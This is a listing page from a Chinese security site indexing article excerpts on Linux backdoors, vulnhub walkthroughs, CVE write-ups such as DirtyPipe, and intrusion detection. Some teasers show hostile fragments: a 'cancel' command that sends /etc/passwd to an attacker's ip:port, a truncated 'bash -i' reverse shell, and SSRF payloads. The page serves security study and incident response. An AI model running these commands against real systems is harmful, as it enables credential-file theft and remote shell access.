passwd - 第 18 | CN-SEC 中文网

应急响应

Linux系统账户后门及排查

系统账户后门是一种最为简单有效的权限维持方式。攻击者在获取目标系统权限的前提下，通过创建一个系统账户作为持久化的据点，这样可以随时通过工具连接到目标系统，达到对目标主机进行长久控制的目的。根据获取的s...

09月26日66 views评论

阅读全文

安全文章

vulnhub靶机-CyberSploit: 2

靶机信息靶机名称：CyberSploit: 2靶机IP：192.168.12.212开始首先进行主机端扫描，探测系统所开放的端口服务发现系统开了两个端口，22端口为SSH远程连接服务，80对应的是一个...

08月28日35 views评论

阅读全文

安全工具

内存马生成器 msmap

项目作者：hosch3n项目地址：https://github.com/hosch3n/msmap0x01 工具介绍Msmap是一个内存马生成器，兼容多种容器、组件、编码器、WebShell / Pr...

08月20日231 views评论

阅读全文

11 个步骤完美排查Linux机器是否已经被入侵

原文:https://cloud.tencent.com/developer/article/18823571、入侵者可能会删除机器的日志信息，可以查看日志信息是否还存在或者是否被清空，相关命令示例：...

08月12日应急响应74 views评论

阅读全文

安全漏洞

ACME Mini_httpd 任意文件读取漏洞 CVE-2018-18778

1.漏洞描述漏洞原因是由于没有过滤Http包头的特定字段，导致可以构造访问系统文件的路径，从而导致可访问任意文件，攻击者可以利用该漏洞读取设备的任意文件，这将严重威胁采用Mini_httpd的设备的安...

07月17日101 views评论

阅读全文

安全文章

Vulnhub之AI web1.0

Pdsdt 2019.10.1在这个举国欢庆的日子里，我充满自豪感的看完了阅兵，正准备打开公司CEO(glzjin)的buuoj平台继续刷刷web和一些入门re，忽然想起CEO说国庆平台要关闭，无奈之...

07月13日28 views评论

阅读全文

安全文章

bypass payload list

→ssrf.php?url=http://127.0.0.1:22→ssrf.php?url=http://127.0.0.1:80→srf.php?url=http://127.0.0.1:443→...

07月05日31 views评论

阅读全文

安全文章

奇淫技巧:linux下无回显可将回显发送到服务器

靶机无回显的情况下可使用 cancel 来把回显发送到攻击机端cancel -u "$(cat /etc/passwd)" -h ip:port攻击机...

07月05日61 views评论

阅读全文

SecIN安全技术社区

Linux内核权限提升漏洞DirtyPipe（CVE-2022-0847）

0x01 漏洞描述 2022年３月７日，研究人员公开披露了Linux 内核中的一个权限提升漏洞（CVE-2022-0847，也称为“Dirty Pipe”），允许非特权用户注入和覆盖任意只读文件中的数...

06月30日89 views已关闭评论

阅读全文

安全漏洞

SonicWall SSL-VPN RCE（远程命令执行）

粗茶淡饭不要紧，朋友散场没关系，兵荒马乱也无所谓…你拥有热气腾腾的灵魂，坚定不移的信念，每一天都有突破，每一步都在前进，坚持下去，沉淀下来。日子总会变好。漏洞简介SonicWallSSL-VPN 8....

06月29日531 views评论

阅读全文

绕过 Linux Shell 限制

常见现实绕过Reverse Shell# Double-Base64 是避免像+之类符号的方法。90%的情况下是有效的echo "echo $(echo 'bash -i >&...

06月14日安全文章38 views评论

阅读全文

安全文章

zico's shop靶机复现

Filename: zico2.ovaFile size: 828 MBMD5:19A5D894D32270875BA6565583BB750BSHA1:75FA4171A28B4B6F7CEB2EB...

06月08日115 views评论

阅读全文

Linux系统账户后门及排查

vulnhub靶机-CyberSploit: 2

内存马生成器 msmap

11 个步骤完美排查Linux机器是否已经被入侵

ACME Mini_httpd 任意文件读取漏洞 CVE-2018-18778

Vulnhub之AI web1.0

bypass payload list

奇淫技巧:linux下无回显可将回显发送到服务器

Linux内核权限提升漏洞DirtyPipe（CVE-2022-0847）

SonicWall SSL-VPN RCE（远程命令执行）

绕过 Linux Shell 限制

zico's shop靶机复现

在线咨询

微信